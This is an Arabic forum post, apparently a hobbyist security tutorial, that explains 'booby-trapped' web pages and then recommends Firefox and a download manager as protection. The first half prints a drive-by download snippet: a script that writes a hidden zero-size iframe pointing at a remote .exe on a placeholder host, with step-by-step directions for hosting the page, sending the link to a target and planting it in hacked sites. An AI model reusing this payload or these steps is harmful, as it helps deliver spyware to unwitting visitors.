السلام عليكم
..
قبل كل شئ لازم تقراء هذا الموضوع (
مقال عن برامج الحماية وطرق الاختراق والهكرز )
عشان هذا الموضوع مرتبط بالموضوع اللي قبله
اليوم راح نتطرق للحماية من ثغرات المتصفح وشرح تفصيلي لها
..
ثغرة المتصفح ثغرة تكون بالمتصفح اللي انت تستعمله سواء متصفح اكسبلور متصفح قوقل الخ ..
الثغرة تمكن اي شخص انه ينزل ملف ويفتحه بجهازك دون لاتدري او يطلع لك هل
(
هل تريد تحميل الملف ) من المتصفح
معانا مثل هذا كود لثغرة لمتصفح قوقل الجديد
هذا الكود
كود PHP:
<s c r i p t >
d o c u m e n t.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</s c r i p t>
اول شئ الهكر يسوي ملف تجسس او فايروس بحجم لايزيد عن 50 كيلو بايت ويرفعه على رابط مباشر
ويضعه مكان
http://www.example.com/hello.exe
مثلا انا رابط ملف التجسس حقي
http://www.xxxxx.com/Patch.exe
يصير الكود معاي كذا
كود PHP:
<s c r i p t>
d o c u m e n t.write('<iframe src="http://www.xxxxx.com/Patch.exe" frameborder="0" width="0" height="0">');
</s c r i p t>
افتح المفكرة واضع فيها الكود واضع رابط الباتش حقك فيها واحفظها بامتداد html كما في الصور
اللحين الصفحة جاهزة وماعلى الهكر الا يرفعها على اي موقع له او اي موقع من استضافة مجانية او حساب رفع
ويعطي الرابط اللي يبغى يخترق جهازه وبمجرد ما انه يدخل يكون جهازه في عداد الاموات ..تطلع له صفحة بيضاء
كان الصفحة اللي اعطاه اياها الهكر مافيها شئ بس يكون نزل ملف التجسس الملغم بالصفحة بجهازه وهو مايدري
كل ثغرة متصفح على متصفح معين مثلا الثغرة اللي تم التطبيق عليها فوق تشتغل على المتصفح قوقل وماتشتغل على الانترنت اكسبلور وغيره
.. يعني كل ثغرة تكون على متصفح معين واكثر المتصفحات اللي حمايتها مو تماام وثغراته كثير الاكسبلور وللاسف اغلب العرب يستعملونه
!
طبعا مو بس هذي الطريقة يقدر يتعمل الهكر يقدر يدمجها مع صفحة عادية او صفحة موقع عادية ولا يغير شئ
وبعض الهكر لما يخترق موقع يلغم صفحته الرئيسية ويخترق جميع الزوار
..
يعني السالفة مو بسيطة ولازم تقي نفسك من ثغرات المتصفح
!
اللحين نجي لطريقة الحماية من التلغيم وثغرات التلغيم للمتصفح
اول شئ انصحك الجميع بمتصفح
الموزيلا فايرفوكس
هذا اروع متصفح انترنت عرفته
.. آمن (
نادر الثغرات ) سهل
.. بسيط
.. عربي
.. دعمه حلو
يوفرون له فريق العمل تحديثات جديدة كل فتره وكل ما اكتشفو خلل امني او ثغرة امنية بالنسخة القديم ينزلون تحديث جديد
للنسخة اللي فيها المشكلة على طول احيانا ينزلون تحديث جديد كل يومين
والاكسبلور ماينزلون تحديث الا من سنة لسنة واحيانا اكثر
..
وتقدر تحمل الفايرفوكس من موقعه الرسمي (
http://ar.www.mozilla.com/ar )
مع ذلك فيه ناس متعودين على الاكسبلور ومايقدرون يتركونه وانا معي الحل
لثغرات التلغيم ببيئة عمل المتصفح الاكسبلور
راح نحتاج برنامج اسمه
Internet Download Manager
تقدر تحمل من موقعه الرسمي (
http://www.internetdownloadmanager.com )
البرنامج هذا للتحميل يستعملونه راعين الافلام دايم ههههههه
.. يعني يسرع التحميل كذا
وفيه ميزه حلو انه يعرض لك هل تريد تحمل ملف التجسس اذا كانت الصفحة ملغمه
يعني هذا البرنامج مايفوت شئ بالصفحة واذا دخلت على صفحة ملغمه راح تطلع لك نافذة برنامج التحميل
ويقولك هل تريد تحميل الملف التالي ويعطيك اسم الملف الملغم بالصفحة وانت تضغط على لا اريد التحميل
ومايدخل الملف بجهازك
بس لازم تسوي كم خطوة بالبرنامج عشان يكشف لك التلغيم صح تابع معي التثيت اول شئ
وبكذا تقدر تدخل اي صفحة ملغمه وانت مرتاح البال وتتحدى اكبر هكر بتلغيم الصفحات ووتصفح بأمان وحرية
..
ان شاء الله يكون الدرس اعجبكم وابشرو بالمزيد بأذن الله
..
./ مخاوي الكيبورد